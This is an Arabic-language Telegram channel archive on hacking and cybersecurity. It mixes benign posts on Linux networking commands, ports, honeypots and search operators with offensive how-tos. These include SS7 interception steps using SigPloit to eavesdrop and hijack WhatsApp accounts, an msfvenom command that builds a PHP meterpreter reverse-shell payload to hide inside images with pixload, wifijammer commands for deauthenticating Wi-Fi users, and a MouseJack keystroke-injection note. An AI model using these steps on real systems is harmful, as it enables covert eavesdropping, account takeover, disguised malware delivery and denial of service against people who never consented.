en
Feedback
Egypt Cyber Security

Egypt Cyber Security

Open in Telegram

This channel talke about Cyber Security and Programming otc ...? joining to group : t.me/ECY_Community

Show more
5 770
Subscribers
No data24 hours
-97 days
-5230 days
Posts Archive
Linux for Hackers من افضل الكورسات الي بتأسسك صح في اهم نظام بنشتغل عليه وهو اللينكس https://mega.nz/folder/7E4jFYTb#AWm4et8A
Linux for Hackers من افضل الكورسات الي بتأسسك صح في اهم نظام بنشتغل عليه وهو اللينكس https://mega.nz/folder/7E4jFYTb#AWm4et8AH8XfFg0GeEnjQA https://t.me/Mr1GhostMan

ثغرة SS7 ثغرة ss7 من الثغرات الخطيرة التي تهدد كل هاتف ذكي حول العالم، تعرّف على كيفية استغلال ثغرة الاتصالات وبروتوكول ss7 وكيفيه تفاديه ما هي ثغرة ss7 اختصارًا لتسمية Signals System No.7 -أي نظام الإشارات السابع- هو بروتوكول اتصالات يستخدم لتبادل البيانات بين الأجهزة، تم إن إنشاءه عام 1975، يستخدم بكثرة في أنظمة الاتصالات اللاسلكية للعديد من شركات الاتصالات حول العالم. استخداماته: يستخدم في أنظمة الاتصالات اللاسلكية المحلية والفواتير المدفوعة مسبقًا، وخدمة الرسائل النصية SMS والخدمات الأخرى. كيفية عمل بروتوكول ss7 فلنفترض أنك تحاول إجراء مكالمة هاتفية بينك وبين صديقك الذي على بعد 40 كم، يقوم بروتوكول ss7 بنقل البيانات المتمثلة بصوتك إلى محطة الاتصالات ثم إلى جهاز صديقة الذي على بعد 40 كم، وأيضًا يحدث العكس مع صديقك. هذه الآلية تحدث أيضًا لرسائل SMS، هذا البروتوكول هو المسؤول عن نقل مثل هذه البيانات الحساسة. الثغرات الأمنية في بروتوكول ss7 يمتلك بروتوكول ss7 عيوبًا وثغراتٍ خطيرة جدًا، أضف إلى ذلك أن أكثر من 800 شركة اتصالات عالمية تستخدم بروتوكول ss7، ما يسبب قلق من عملية استغلال ثغراته. تكمن ثغرة بروتوكول ss7 إلى إمكانية الاعتراض والتجسس على المكالمات والرسائل القصيرة SMS، كذلك تتبع المواقع الجغرافية للمستخدمين. ايضًا هذا يعني إمكانية تجاوز المصادقة الثنائية التي تستخدم الرسائل القصيرة بكل سهولة، واختراق معظم شبكات التواصل الاجتماعي مثل فيس بوك و تويتر… الخ. بالإضافة إلى تطبيقات المراسلة مثل WhatsApp و Telegram، وأي تطبيق يطلب رمز تأكيد عن طريق إرسال كود إلى الرقم باستخدام SMS أو الاتصال المباشر. كيفية الهجوم حتى تقوم بعمل هجمة بروتوكول ss7، تحتاج إلى أدوات مادية لتحليل الاتصالات، كذلك أدوات برمجية. أداة SigPloit أداة SigPloit هي برمجية لاختبار إشارات الشبكة الاتصالات اللاسلكية المحلية وتستخدم أيضًا في عملية استغلال ثغرة بروتوكول ss7. تنزيل وتثبيت أداة SigPloit أولًا نقوم بتنزيلها من موقع github من هذا الرابط أو بالأمر التالي لتنزيل الملف مباشرةً git clone https://web.archive.org/web/20201203032412/https://github.com/SigPloiter/SigPloit بعد التنزيل نقوم بعملية التثبيت cd SigPloitsudo pip2 install -r requirements.txt python sigsloit.py ثانيًا: اختيار الوحدة النمطية كـ SS7 Myثالثًا: ضبط الخيارات: client_pc serve-pc server IP port MSISDN ثم ادخال رقم الهاتف. رابعًا: التقاط الحزم من أي محلل مثل الواير شارك. من خلال تحليل الحزم في ثغرة ss7 يمكنك التنصت على الحزم والتي تتضمن الرسائل النصية والمكالمات الهاتفية. خامسًا: جمع المعلومات باستخدام أداة “HackRF one” جهاز HackRF one، يعمل على تحليل الموجات الراديوية بشكل عام مثل FM و GSM و LTE، ويمكنه بذلك تحليل الموجات التي تطلقها أبراج الاتصالات؛ لكن للأسف لا يمكن عمل هجمة من خلال ثغرة ss7 بدون هذا الجهاز، يمكنك شراء واحد من متجر أمازون من هنا، بسعر 319.95 دولارًا. اختراق WhatsApp هجوم ثغرة ss7 غالبًا ما يستهدف تطبيق واتساب وذلك لأن لديه أكثر من مليار مستخدم من أكثر من 180 دولة يوميًا؛ قد يظن البعض أن التشفير التام للرسائل في الواتساب يحميه كليّا، لكنه في الأصل يعتمد على التحقق من خلال الرقم (إما رسالة قصيرة أو اتصال) للوصول إلى حساب واتساب الذي مما يمكّن المخترقين من سرقة حساب الواتساب بالكامل، هذا لا يقف عند تطبيق واتساب فقط، فهناك حسابات وتطبيقات أخرى تعتمد على التحقق برقم الهاتف مثل فيس بوك والتيليجرام،، تقريبًا أغلب الخدمات تطلب التحقق من رقم الهاتف!! كيف أحمي نفسي من ثغرة ss7؟ توصل باحث أمن سيبراني ألماني إلى تطبيق أندرويد يمكنه تجميع وتحليل بيانات الهاتف المحمول لكي تراقب الأمان في الشبكة وتحذرك من الهجمات ss7 في الجوار وهو تطبيق SnoopSnitch. يتطلب هذا البرنامج صلاحيات الروت (المستخدم الجذر) يصف المختصون بعدم تفعيل رقم الهاتف إذا كان مرتبطًا بوسائل التواصل الاجتماعي خاصتك، أي بمعنى تخصيص رقم للمكالمات ورقم آخر للواتساب والفيس بوك وغيرها. شركات تضررت من هذه الثغرة شركة O2-Telefonica البريطانية. شركة Telecom الألمانية ما الحل لثغرة ss7 يصف بعض الباحثون بأنه لا توجد طريقة لتفادي هذه الهجمات، ولكن يمكن الكشف عنها قبل استغلالها بواسطة المحاكاة الافتراضية، بالإضافة إلى أن هذه الثغرة ليست عيبًا في النظام وإنما هي من طبيعته. مع أننا في عام 2021، إلا أن الكثير من شركات الإتصال المصابة أنظمتها بهذه الثغرة تعد أن مثل هذه الثغرات تمثل تهديد منخفض المستوى، لكن هناك قراصنة مجهولون من يثبت استغلال أخطاء في ثغرة ss7. https://t.me/Mr1GhostMan

تعتبر تقنيات الهوني بوت أحد اهم التقنيات على مستوى امن الشبكات فهي كمثل مصيدة يتم اصطياد الهاكرز ‏والمخترقين من خلالها.‏ ‏ ما المقصود ب تقنية ‏Honeynet ؟ هوني بوت يقصد بها بالإنجليزية وعاء العسل وهو عبارة عن فخ لتقصي المحاولات الغير المصرحة بها للولوج إلى ‏نظام الشبكة , فهذه التقنية يتم وضعها في عدة أماكن داخل الشبكة لكي تتم معرفة كيف يقوم المخترق بالتجسس و ‏استغلال الضعف في نظم الحاسب.‏ ما الهدف من تقنيات ‏Honeypot ؟ الهوني بوت بشكل عام هو جهاز حاسوب وهمي او اجهزه وهمية مصممة لمحاكاة أجهزة حقيقية يتم وضعا داخل ‏الشبكة بشكل واضح لتكون الجزء المستهدف في الشبكة ولكن في الواقع هي معزولة ومراقبة تسجل جميع تحركات ‏الهاكرز ، ويبدو وكأنها تحتوي على معلومات ومصادر ذات قيمة للمخترق، فيما يكون دورها استدراج المخترق ‏وبطبيعة الحال وقوعه في المصيدة.‏ تقسيمات تقنية ‏Honeypot ؟ ‏ هنالك عدة تقسيمات لهذه الأنظمة، فمنهم من صنفها تبعا لطبيعة الاستخدام ومنهم من صنفها حسب طريقة تصميم ‏الشبكة.‏ حسب أول تصنيف (طبيعة الاستخدام) فإنه يتم تقسيمها لقسمين وهما:‏ 1-Production Honeypot‏: وهي تلك التي يتم استخدامها لحماية الشبكات والأنظمة في المنظمات والمؤسسات ‏والشركات لزيادة تأمين هذه المؤسسة وحمايتها. يتميز هذا النوع بسهولة استخدامه لكنه يوفر معلومات قليلة عن أي ‏هجوم.‏ 2-Research Honeypot‏: وهي التي يتم استخدامها في الأبحاث من قبل الحكومات والمنظمات والجهات العسكرية ‏لكشف أي برامج خبيثة وتحليل الهجمات التي من الممكن أن تتعرض لها. و يعتبر هذا النوع معقد و لكنه يوفر ‏معلومات كثيرة عن الهجوم.‏ اما بالنسبة للتصنيف الثاني (وهي الذي يعتمد على طريقة تصميم الشبكة) فإنه يتم تقسيم هذه الأنظمة الى ثلاثة أنواع ‏وهي:‏ 1-Pure Honeypot‏: و هي انظمة كاملة تستخدم الشبكات الفعالة ولا تحتاج لأي أنظمة او برامج أخرى لكي يتم ‏تنصيبها معها.‏ 2-High-interactive Honeypot‏ : هذا النوع يتم عن طريق تقليد الانظمة بأنظمة مماثلة بنفس العدد من الخدمات و ‏ذلك لإشغال المخترق بفحص جميع الخدمات لإضاعة وقته و هي أكثر أمنا بحيث يصعب كشفها بسهولة و لكن تكلفتها ‏عالية.‏ 3-‎ Low-interaction Honeypot‏: وهي عبارة عن محاكاة للخدمات الأكثر طلبا من قبل المخترقين (او من يحاولون ‏الاختراق) وذلك لأنها تستخدم مصادر قليلة من النظام, بحيث يمكن الاستفادة من ذلك بعمل أكثر من جهاز وهمي على ‏نفس الجهاز الحقيقي و الاستفادة منها معا.‏ وأيضا حسب ما تم ذكره من أصناف سابقة يمكن تصنيفها حسب الخدمة التي تكون الغاية من جذب المخترقين اليها، ‏فممكن أن يكون هنالك Database Honeypot Malware Honeypot Spam Honeypot وغيرها... https://t.me/Mr1GhostMan

ما الفرق بين الاي بي IP والبورت Port والبروتوكول Protocol ⁉️ : لكى تتواصل الاجهزة مع بعضها فى شبكة واحدة سواء شبكة داخلية LAN او على الانترنت WAN نحتاج لثلاثة امور هامة جدا وهى : IP address ( 192.168.1.1 ) ( 10.0.0.2 ) Port ( 80 – 25 – 110 – 21 – 53 – 23 ) Protocol ( HTTP – SMTP –pop – ftp – DNS - telnet او HTTPS --------------- IP address : هو المعرف الرقمي لأي جهاز (حاسوب، هاتف محمول، آلة طابعة) مرتبط بشبكة معلوماتية تعمل بحزمة بروتوكولات الإنترنت، سواء أكانت شبكة داخلية أو شبكة الإنترنت. ------------ Protocol : هو عبارة عن برنامح يكون موجود تلقائيا فى اى نظام تشغيل ( ويندوز – ماك - لينكس ) فاى نظام تشغيل فى العالم يكون به بروتوكول HTTP المسئول عن تصفح الانترنت . ------------ Port : ثغرة برمجية فى انظمة التشغيل وعدد هذه الثغرات ما بين 0 – 65536 تغرة برمجية ، وكل ثغرة يعمل عليها بروتوكول مختلف عن الاخر. الثغرة البرمجية : فتحة او بوابة فى كل انظمة التشغيل لتنظيم دخول وخروج الداتا. انواع البروتوكولات والبورتات - نتعرف الان على عدد من اشهر بروتوكولات الانترنت : SMTP او Simple Mail Transfer Protocol : هو برتوكول ارسال البريد الالكترونى عبر الانترنت يعمل على Port 25. POP او Post Office Protocol : هو بروتوكول استقبال البريد الالكترونى عبر الانترنت ويعمل على Port 110. FTP او Transfer Protocol File : هو بروتوكول التحميل من الانترنت ويعمل على Port 21. DNS او Domain Name System : هو بروتوكول يقوم بترجمة أسماء النطاقات من كلمات إلى أرقام تعرف باسم عنوان الأي بي ) يعمل على Port 53. Telnet او Terminal Network : هو بروتوكول يتيح للمستخدمين إمكانية تشغيل البرامج عن بعد ويعمل على Port 23. https://t.me/Mr1GhostMan

بعض أوامر لينكس و تلاحظ أن أغلبها تحتاج إلي صلاحيات الجذر (روت) تعيين عنوان آي بي # ifconfig eth0 192.168.2.1/24 إضافة عنوان آي بي إلى واجهة الشبكة # ifconfig eth0:1 192.168.2.3/24 تغيير عنوان الماك # macchanger -m MACADDR INTR تغيير عنوان الماك باستخدام واجهة ifconfig # ifconfig eth0 hw ether MACADDR تغيير حجم MTU باستخدام ifconfig الى 1500 # ifconfig eth0 mtu 1500 إضافة آي بي مخفي لا يظهر مع واجهة ifconfig # ip addr add 192.168.0.1/24 dev eth0 حظر مجال محدد # tcpkill -9 host domain.com عرض ملخص لمنافذ UDP و TCP المفتوحة # watch ss -stplu إظهار منافذ الشبكة مع معرفات العملية PIDs # netstat -tulpn لتتبع الطلب المفتوح لمنافذ الشبكة # strace -f -e trace=bind nc -l 80 لتتبع الطلب المفتوح لمنفذ الشبكة UDP / TCP # strace -f -e trace = network nc -lu 80 عرض العملية التي تستخدم الاتصال بالإنترنت # lsof -P -i -n عرض العملية التي تستخدم رقم منفذ محدد # lsof -i tcp: 443 عرض كافة المنافذ المفتوحة # lsof -Pnl -i عرض المنافذ المفتوحة المستمع اليها # lsof -Pni4 | grep LISTEN | column -t لجميع المنافذ المفتوحة وملفاتها التنفيذية # lsof -i -P | grep -i "listen" لجميع منافذ الاستماع مع PID للعمليات المرتبطة # lsof -Pan -i tcp -i udp لجميع الملفات التي تم فتحها بواسطة أمر معين # lsof -c "process" لعرض نشاط المستخدم لكل دليل # lsof -u username -a +D /etc لعرض دليل العمل الحالي للعملية # lsof -p < PID > | grep cwd لإظهار أكبر 10 ملفات مفتوحة # lsof / | \ awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | \ sort -n -u | tail | column -t لقتل عملية تعمل على منفذ محدد # kill -9 $ ( lsof -i: < port > | awk ' {l = $ 2} end} print l} ' ) لعرض كافة المنافذ المفتوحة على TCP # ss -ta للاستعلام عن خوادم DNS استخدم # nslookup google.com او # dig google.com وللبحث العكسي لمجال محدد # nslookup 192.168.0.1 لالتقاط وتحليل حزم TCP / IP المستلمة والمرسلة عبر الشبكة على واجهة محددة # tcpdump -i eth1 لتحديد عدد معين للحزمات # tcpdump -c 5 -i eth1 لالتقاط الحزم مع حفظها لتحليلها لاحقا # tcpdump $ -w capture.pacs -i eth1 أوامر أداة واجهة تكوين الشبكة ifconfig لتكوين واجهة الشبكة يتم استخدامه لعرض عنوان الآي بي للحالة وعنوان الماك للجهاز المستخدم بالإضافة إلى حجم وحدة الإرسال القصوى MTU للواجهات النشطة حاليا مفيد ايضا في تصحيح الأخطاء و ضبط النظام ويستخدم أيضا لتهيئة واجهات في وقت تمهيد النظام بمجرد تشغيل الخادم ويمكن استخدامه لتعيين عنوان آي بي للواجهة وتمكينها أو تعطيلها لعرض حالة جميع واجهات الشبكة النشطة # ifconfig لجميع الواجهات المتاحة حاليا لأعلى أو لأسفل # ifconfig -a لتعيين عنوان آي بي للواجهة # sudo ifconfig eth0 192.168.56.5 netmask 255.255.255.0 لتنشيط واجهة الشبكة # sudo ifconfig up eth0 لإلغاء تنشيطها # sudo ifconfig down eth0 لعرض وتعيين وظائف مماثلة استخدم الأمر # ip addr show لتعيين عنوان آي بي مؤقت لواجهة شبكة معينة # sudo ip addr del 192.168.56.15/24 dev eth0 و لإزالته من الواجهة # sudo ip addr del 192.168.56.15/24 dev eth0 https://t.me/Mr1GhostMan

اداة Th3inspector اداة سريعة وفعالة لجمع المعلومات تقدر منها تجمع معلومات عن مواقع الانترنت وللبحث عن عنوان IP وخادم البريد الإلكتروني وايضا الفحص باستخدام Whois والمجال الفرعي والخدمات النشطة على المورد تقدر كمان تفحص منها bin صندوق بطاقة الائتمان وتقدر تتأكد من وجود البريد من عدمه للتحميل https://github.com/Moham3dRiahi/Th3inspector # cd Th3inspector # ./install.sh وللتشغيل # Th3inspector او perl Th3inspector.pl

Repost from Zero Security
مش بحب ادخل محتوي دين في قناه محتواها مختلف تماما عن الدين بس للاسف ده محتوي مكتوب مش زي الفديوا اقدر في نص الكلام اقول حاجه عايز اقولها عمتا بما أن دي زي صفحتي الشخصيه ف حبيت انشر لمره أوله واخيره شي ممكن يهدي شخص ويرجع لربنا https://youtu.be/GK-RLek02Pk برودكاست وعي : https://youtube.com/playlist?list=PLCpK4282MCT-lBXi4Nodjzq1TDZsK9qwr مقطع رائع للرجوع لله والتوبة : https://youtu.be/m4UWYvELMIs

اداة pixload لوضع البايلود داخل صورة اداة لكل صيغة bmp و jpg و gif و png للتحميل https://github.com/chinarulezzz/pixload اذا كنت تريد حقن بايلود metasploit فجرب باستخدم msfvenom مثال msfvenom -p php meterpreter_reverse_tcp /LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php ثم لادخال البايلود حسب الصيغة jpg.pl -payload ( ...... ) لصيغة bmp استخدم الامر ./bmp.pl [ -payload 'string ] -output payload.bmp مثل ./bmp.pl -output payload.bmp ولصيغة jpg /jpg.pl -output payload.jpg ولصيغة gif ./gif.pl -output payload.gif https://t.me/Mr1GhostMan

اداة wifijammer لقطع الاتصال والتشويش على متصلين wifi للتحميل https://github.com/DanMcInerney/wifijammer التثبيت # cd wifijammer # python setup.py install للفتح ممكن تستخدم python wifijammer او باستخدام قبل اسم الاداة ./ # ./wifijammer -a 00: لإلغاء مصادقة جميع العملاء المرتبطين بقناة الوصول 1 او 2 وتحدد بحرف c ويمكنك أيضا وضع عنوان ماك معين مثل : # ./wifijammer -a 00: 0E: DA: DE: 24: 8E -c 1 توضيح -a 00: إلغاء مصادقة المتصلين للعنوان المحدد E: DA: DE: 24: 8E -c 1 او -c 2 لقنوات الوصول -d لتسريع عمليات الإلغاء للعملاء الذين تم العثور عليهم بدلا من ارسال deauths -p يأتي بعدها عدد حزمات ال ap المرسلة الى العميل وعنوان البث -m لتحديد حد اقصى للمتصلين -n لتعيين حد اقصى مع عدم جعل القائمة تمسح نفسها بعد الوصول للحد الاقصى -s لتخطي الغاء تثبيت ماك معين حيث يعد تجاهل عنوان MAC معين مفيدا في حالة رغبتك في إغراء الأشخاص بالانضمام إلى نقطة الوصول الخاصة بك في حالة رغبتك في استخدام LANs.py --world لضبط الحد الاقصى للقناة مثال # ./wifijammer -c 1 -p 10 -s DL: 3D: 8D: JJ: 39: 52 -d --world https://t.me/Mr1GhostMan

شوية أسرار بسيطه لو كتبناها واحنا بندور هنوصل الى احنا محتاجينه بكل ببساطه 1- السر الأول (+) نستخدم + لما نحتاج ندور على حاجتين مع بعض - مثال : Computer+internet eat + drink 2- السر التانى (-) نستخدم - لما نحتاج ندور على كلمه معينه مرتبطه بكلمه تانيه بس احنا محتاجين الكلمه الاولى بس - مثال : Green - burger كده هيدور على green بس ومش هيظهر اى حاجه عن burger 3- السر التالت ( " " ) نستخدم " " لما نحتاج ندور فى المواقع على جمله مترتبه - مثال " i use facebook " كده هيدور على كل المواقع الى فيها الجمله ده بترتيب الكلام بالظبط 4- السر الرابع (OR) نستخدم OR لما ندور على كلمتين فى بس مش مش يكونوا مع بعض - مثال Eat or Drink كده هيدور على المواقع الى فيها eat ومش شرط يكون فيها drink وبرده هيدور على المواقع الى فيها drink ومش شرط يكون فيها eat 5- السر الخامس :site بنستخدم :site لما نحتاج ندور موضوع داخل موقع معين - مثال messi Site:Facebook كده هيدورلك على كلمه messi فى موقع الفيس بوك 6- السر السادس (*) نستخدم * لما نكون بندور وناسين كلمه من الى احنا بندور عليه - مثال how to * football كده هيدور على كل كل جمله فيها التلات كلمات دور واكيد هتلاقى الى انت كنت بدور عليه 7- السر السابع +time بنستخدم الامر ده + time لما نحتاج نعرف الوقت فى دوله معينه - مثال Time + England كده هيجبلك الوقت فى انجلترا 8- السر التامن Info بنستخدم info لما نحتاج نعرف معلومه عن موقع معين - مثال : Info : www.twitter كده هيطلعلك كل المعلومات عن موقع تويتر 9- السر التاسع :filetype بنستخدم الأمر ده لما نكون بندور على حاجة وعاوزنها تطلع فى صورة ملفات أو برنامج لتحميل مثال: Mechanical engineering filetype:pdf كده هيطلع كل نتيجة البحث ملفات 10- السر العاشر لو عايز تبحث عن حاجات علمية في جوجل وعايز نتائج بحث أكاديمية كل الي عليك انك تضيف العبارة دي site:edu للبحث بتاعك مثلاً لو كتبت (المريخ site:edu) حتظهر ليك نتائج المواقع الأكاديمية العربية اما لو كتبت (Mars site:edu) هتظهر ليك النتائج باللغة الإنجليزية https://t.me/Mr1GhostMan

مساء الخير Mouse jacking طبعا معظمنا عارف القاعدة اللي بتقول its wireless its crackable طول ما التقنية دي لاسلكية هي قابلة للاختراق النهاردة هنتكلم عن ال wireless keyboard , mouse الماوس والكيبورد الوايرليس اللي كلنا بنستخدمهم تقريبا بيعرضوا جهازك للاختراق ممكن الattacker ينفذ عملية mitm attack ويعمل sniffing لضغطاتك علي المفاتيح وكمان ممكن يعمل keystroks injection ويحقن اوامر في جهازك وياخد عليه remote shell وده كله من علي بعد مسافة تصل ل ١٠٠ متر او اكتر وبدون ما يقرب من جهازك عشان تجرب تنفذ الattack ده بنفسك هتحتاج جهاز فيه نقطة الضعف دي عشان يكون التارجت بتاعك وهتحتاج اداة اسمها crazy radio وممكن تستخدم logitech unifying reciever كبديل ليها ودي لينكات. تخص الموضوع ده https://www.mousejack.com/ https://t.me/Mr1GhostMan🫡

الحرب التقليدية لم تبدأ لكنها انطلقت في الفضاء السيبراني.. أميركا تكتشف شبكة متسللين روس حصلت على معلومات مهمة بدأت عمليات استهداف متكررة لمقاولي الدفاع الأميركيين اعتبارا من يناير/كانون الثاني 2020، من قبل المتسللين الروس، وذلك وفقا لوكالة الأمن السيبراني والبنية التحتية الأميركية "سي آي إس إيه" (CISA). إلى جانب مكتب التحقيقات الفدرالي ووكالة الأمن القومي، تتوقع وكالة الأمن السيبراني والبنية التحتية أن يواصل المتسللون المدعومون من روسيا استهداف مقاولي الدفاع في المستقبل القريب، وفق تعبير الوكالة. وأضافت الوكالة "من خلال الحصول على مستندات داخلية واتصالات عبر البريد الإلكتروني، قد يكون الخصوم قادرين على تعديل خططهم وأولوياتهم العسكرية، وتسريع جهود التطوير التكنولوجي، وإبلاغ صناع السياسة الأجانب بنوايا الولايات المتحدة واستهداف المصادر المحتملة للتجنيد". يأتي هذا التحذير في الوقت الذي تستمر فيه التوترات بين الولايات المتحدة وروسيا في التصاعد بشأن غزو محتمل لأوكرانيا. وفي الأسابيع الأخيرة، واجهت البلاد عدة هجمات إلكترونية، كان آخرها في وقت سابق من هذا الأسبوع. وعانت وزارة الدفاع الأوكرانية واثنان من البنوك المملوكة للدولة من هجمات الحرمان من الخدمة. ولم تُنسب الهجمات مباشرة إلى الجهات الفاعلة المدعومة من روسيا، لكن الدولة ألقت باللوم على جارتها في يناير/كانون الثاني الماضي في حملة أعاقت عشرات المواقع الحكومية.

أنواع تهديدات الأمن السيبراني برامج الفدية الضارة 1:برامج الفدية هي نوع من البرامج الضارة. وهي مصممة بهدف ابتزاز المال عن طريق منع الوصول إلى الملفات أو نظام الكمبيوتر حتى يتم دفع الفدية. ولا يضمن دفع الفدية استرداد الملفات أو استعادة النظام. 2:البرامج الضارة البرامج الضارة هي نوع من البرامج المصممة للوصول غير المصرح به إلى جهاز الكمبيوتر أو إلحاق الضرر به. 3:التحايل باستخدام الهندسة الاجتماعية الهندسة الاجتماعية هي أسلوب يستخدمه الخصوم لاستدراجك إلى الكشف عن المعلومات الحساسة. يمكنهم طلب الحصول على دفع نقدي أو الوصول إلى بياناتك السرية. ويمكن دمج الهندسة الاجتماعية مع أي من التهديدات المذكورة سابقًا لزيادة فرصتك في النقر على الروابط أو تنزيل البرامج الضارة أو الوثوق بمصدر ضار.

تصيد المعلومات تصيد المعلومات هو عملية إرسال رسائل بريد إلكتروني احتيالية تشبه رسائل البريد الإلكتروني من المصادر الموثوقة. والهدف هو سرقة المعلومات الحساسة مثل أرقام بطاقة الائتمان ومعلومات تسجيل الدخول. وهو أكثر أنواع الهجمات الإلكترونية شيوعًا. يمكنك المساعدة في حماية نفسك من خلال التثقيف أو استخدام الحلول التقنية التي تعمل على تصفية رسائل البريد الإلكتروني الضارة.

ما هو الأمن السيبراني يحتوي نهج الأمن السيبراني الناجح على طبقات متعددة من الحماية تنتشر عبر أجهزة الكمبيوتر أو الشبكات أو البرامج أو البيانات التي يرغب المرء في الحفاظ عليها. بالنسبة للأشخاص والعمليات والتكنولوجيا، يجب أن يكمل كل منها الآخر داخل المؤسسة لإنشاء دفاع فعال في مواجهة الهجمات السيبرانية يمكن لنظام إدارة التهديدات الموحد أتمتة عمليات التكامل على مستوى منتجات Cisco Security المحددة وتسريع وظائف عمليات الأمان الرئيسية: الاكتشاف والتحقيق والمعالجة. الأشخاص يجب على المستخدمين فهم المبادئ الأساسية لأمان البيانات والامتثال إليها مثل اختيار كلمات مرور قوية والحذر من المرفقات الموجودة ضمن البريد الإلكتروني والنسخ الاحتياطي للبيانات. تعرف على المزيد حول المبادئ الأساسية الأمن السيبراني. العمليات يجب أن تمتلك المؤسسات إطار عمل حول كيفية التعامل مع الهجمات السيبرانية غير المكتملة والناجحة. يمكن لـ إطار عمل واحد يحظى بقدر من الاحترام أن يرشدك. يوضح كيف يمكنك تحديد الهجمات وحماية الأنظمة واكتشاف التهديدات والتصدي لها والتعافي من الهجمات الناجحة. التقنية توفير التكنولوجيا هو أمر ضروري لمنح المؤسسات والأفراد أدوات الأمن السيبراني اللازمة لحماية أنفسهم من الهجمات السيبرانية. يجب حماية ثلاثة كيانات رئيسية: الأجهزة الطرفية مثل أجهزة الكمبيوتر والأجهزة الذكية والموجّهات والشبكات والسحابة. تتضمن أشكال التكنولوجيا الشائعة المستخدمة لحماية هذه الكيانات، الجيل التالي من الجدران النارية وتصفية DNS والحماية ضد البرامج الضارة وبرامج مكافحة الفيروسات وحلول أمان البريد الإلكتروني. ما سبب أهمية الأمن السيبراني؟ في عالم اليوم المتصل، يستفيد الجميع من برامج الدفاع الإلكتروني المتقدمة. على المستوى الفردي، يمكن أن يُسفر هجوم الأمن الإلكتروني عن الكثير من الأشياء، بدءًا من سرقة الهوية ومرورًا بمحاولات الابتزاز ووصولًا إلى فقدان البيانات المهمة مثل صور العائلة. يعتمد الجميع على بنية أساسية حيوية مثل محطات الطاقة والمستشفيات وشركات الخدمات المالية. وتأمين هذه المؤسسات وغيرها هو أمر ضروري للحفاظ على سير عمل المجتمع لدينا. كما يستفيد الجميع من عمل الباحثين في مجال التهديدات السيبرانية، مثل فريق Talos المكون من 250 باحثًا، والذين يحققون في التهديدات الجديدة والناشئة وإستراتيجيات الهجوم السيبراني. وهم يعملون على كشف الثغرات الأمنية الجديدة وتثقيف الجمهور حول أهمية الأمن السيبراني ودعم الأدوات مفتوحة المصدر. تجعل جهودهم من الإنترنت مكانًا أكثر أمنًا للجميع.

افضل محركات البحث لمختبرين الإختراق ومحترفين السيكيورتي https://censys.io https://shodan.io https://viz.greynoise.io https://
افضل محركات البحث لمختبرين الإختراق ومحترفين السيكيورتي https://censys.io https://shodan.io https://viz.greynoise.io https://zoomeye.org https://netograph.io https://wigle.net https://intelx.io https://fofa.so https://hunter.io https://haveibeenpwned.com https://crt.sh/ https://dnsdumpster.com/ t.me/hk_tricks شكر عام لمن يدعم و يتفاعل❤️

السلام عليكم ورحمة الله وبركاتة الادمن الجديد المختص في الامن السيبراني اول بنكون ننشر الاخبار عن الامن السيبراني ادوات تحديثات جديدة كل مايتعلق بالامن السيبراني بنسبه للكورسات في الامن السيبراني في الكثير منها بس نشتي يكون في اكبر عدد ممكن من الاعضاء اول ماتصل القناة ٣٥٠٠ بانزل لكم كورس جميل جدا عندكم اقتراحات وفكر شاركونا https://t.me/Mr1GhostMan

محتاجين ادمن للقناه ينشر عن الأمن السيبراني ونظام لينكس @root_security

Repost from Manjmy منجمى
استخدامات اشهر لغات البرمجة ❤❤: 1) لغة ++C -برمجة تطبيقات سطح المكتب -برمجة الالعاب -بناء نظم التشغيل. -وتطوير ألعاب الفيديو المختلفة -------------------- 2) لغة #C -برمجة تطبيقات الهواتف الذكية (اندرويد - ابل) -صناعة و تطوير برمجيات متجر الويندوز -صناعة تطبيقات سطح المكتب (Desktop) -------------- 3) لغة ASP -برمجة المواقع الالكترونية -تصميم المواقع الالكترونية 4) لغة Php -برمجة المواقع الالكترونية -برمجة بوتات التليجرام -تستخدم من قبل خادم الويب لبرمجة المواقع و البرامج و هي يمكن إستخدامها مع انوع مختلفة من أنظمة ادارة البيانات و تتوافق مع أنظمة تشغيل مختلفة . --------------------- 5) لغة الجافا Java -برمجة تطبيقات سطح المكتب -برمجة المواقع الالكترونية -برمجة الالعاب - برمجة تطبيقات الهواتف الذكية -------------------- 6) لغة البايثون Python -تحليل البيانات -تعلم الاله -التعلم العميق -الذكاء الاصطناعي -برمجة المواقع الالكترونية -التشفير و الحماية -الشبكات والسيرفرات -------------- 7) لغة R -تحليل البيانات -------------------- 8 لغة الكوتلين kotlin -برمجة تطبيقات الهواتف الذكية (اندرويد) ------------------- 9) لغة Swift -برمجة تطبيقات الهواتف الذكية (ابل) ---------------- 10 )لغة جافا سكربت(JavaScript ) -برمجة المواقع الالكترونية -تصميم المواقع الالكترونية -تصميم تطبيقات الهواتف الذكية -تصميم تطبيقات سطح المكتب -برمجة الالعاب ======================== ودي اقوى القنوات العربيه لتعلم لغات البرمجه 2022 1 - افضل القنوات لتعلم لغات تطوير مواقع الويب 2- افضل القنوات العربيه لتعلم البرمجه - الخوارزميات 3 - افضل القنوات لتعلم لغة C++: 4 - افضل القنوات لتعلم لغة C# 5 - افضل القنوات لتعلم لغة Java 6- افضل القنوات لتعلم لغة Python 7 - افضل القنوات لتعلم لغة Kotlin 8 - افضل القنوات لتعلم لغة Flutter & Dart 9 -افضل القنوات لتعلم الذكاء الاصطناعي 10- افضل القنوات لتعلم قواعد البيانات لينكات جميع القنوات من هنا :- https://bit.ly/33fJZQE ____

مساء الخير عليكم ملاحظ ان فيه اسئلة كتير بتيجي بخصوص كالي لينكس .... هو ليه الناس فاهمة ان اللينكس ده معمول للهاكنج ؟؟ اللينكس فيه توزيعات اللي معروفين منهم اكتر من 450 توزيعة ليه كله مركز مع الكالي بس ..... اللينكس ده مجرد نظام تشغيل زيه زي الويندوز او الماك او غيرهم وكمان توزيعة كالي دي مخصصة للناس اللي بتشتغل في السيكيوريتي عموما وعلى فكرة تقدر تكون شبح في السيكيوريتي وانت بتستعمل الويندوز عادي صح بمجهود اكبر شوية لان اللينكس بيسهل عليك حاجات لكن النتيجة في الاخر واحدة .... مينفعش تكون جاي من الويندوز مباشرة على الكالي احنا ابتدينا باوبونتو وديبيان ومنت ولما ايدينا مشيت في اللينكس كنظام تشغيل نزلنا الكالي فياريت متنطش علطول على التوزيعة دي غير لما ايدك تاخد على اللينكس عموما ودي مجرد نصيحة مش اكتر علشان متضيعش وقتك ..... الكالي مش معمول علشان تخترق واي فاي جيرانك طبعا هي حرام في كل الاحوال بس تقدر تعملها بالويندوز او حتى بالاندرويد ..... مش مهم العربية المهم السواق